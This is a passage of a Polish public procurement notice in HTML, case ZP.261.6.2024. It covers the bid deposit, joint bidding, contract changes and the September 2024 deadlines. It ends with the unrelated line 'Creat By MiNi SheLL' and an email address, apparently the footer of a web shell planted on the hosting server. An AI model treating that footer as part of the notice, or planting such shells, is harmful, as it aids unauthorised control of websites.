uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca składając ofertę zobowiązany jest wnieść wadium w wysokości 1 500,00 zł (słownie: jeden tysiąc pięćset i<br/>zero groszy).<br/>2) Wadium wnosi się przed upływem terminu składania ofert, tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>3) Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek Zamawiającego: Bank Gospodarstwa Krajowego: 11<br/>1130 1017 0021 1003 0990 0001 z adnotacją „Wadium do sprawy ZP.261.6.2024”. Skuteczne wniesienie wadium w<br/>pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego przed upływem terminu<br/>składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni wykonawcy - Załącznik nr 4 do SWZ.<br/>3) W przypadku, gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu bazuje na<br/>udostępnionych zasobach podmiotu trzeciego – spełnienie wymogu dotyczącego braku podstaw wykluczenia, o którym<br/>mowa w rozdziale VIII musi zostać wykazane również przez ten podmiot.<br/>4) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów składa wraz z ofertą zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub<br/>inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów - Załącznik nr 4.1 do SWZ.<br/>5) Zamawiający na każdym etapie postępowania może uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia.<br/>6) Zamawiający nie wymaga wykazania braku podstaw do wykluczenia w stosunku do podwykonawców, którym<br/>Wykonawca zamierza powierzyć wykonanie części zamówienia, a którzy nie udostępniają Wykonawcy swoich zasobów na<br/>wykazanie spełniania warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewidziano zmiany umowy zgodnie z projektem umowy stanowiącym załącznik nr 8 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia: OD DNIA ZAWARCIA UMOWY, NIE PÓŹNIEJ NIŻ DO DNIA 31.07.2025R.<br/>- ETAP 1 W TERMINIE 30 DNI KALENDARZOWYCH OD DATY ZAWARCIA UMOWY NIE PÓŹNIEJ NIŻ 30.11.2024R<br/>- ETAP 2 W TERMINACH OKREŚLONYCH W ZAŁĄCZNIKU NR 1 DO SWZ – SZCZEGÓŁOWY OPIS PRZEDMIOTU<br/>ZAMÓWIENIA - OD DATY PISEMNEGO ZGŁOSZENIA PRZEZ ZAMAWIAJĄCEGO MOŻLIWOŚCI REALIZACJI II ETAPU<br/>UMOWY<br/>- SPRAWOWANIE NADZORU AUTORSKIEGO ORAZ INWESTORSKIEGO – 12 MIESIĘCY OD ZGŁOSZENIA<br/>ZAPOTRZEBOWANIA PRZEZ ZAMAWIAJĄCEGO<br/><br/>Kryterium oceny ofert: szczegółowo opisano w rozdziale XVI SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com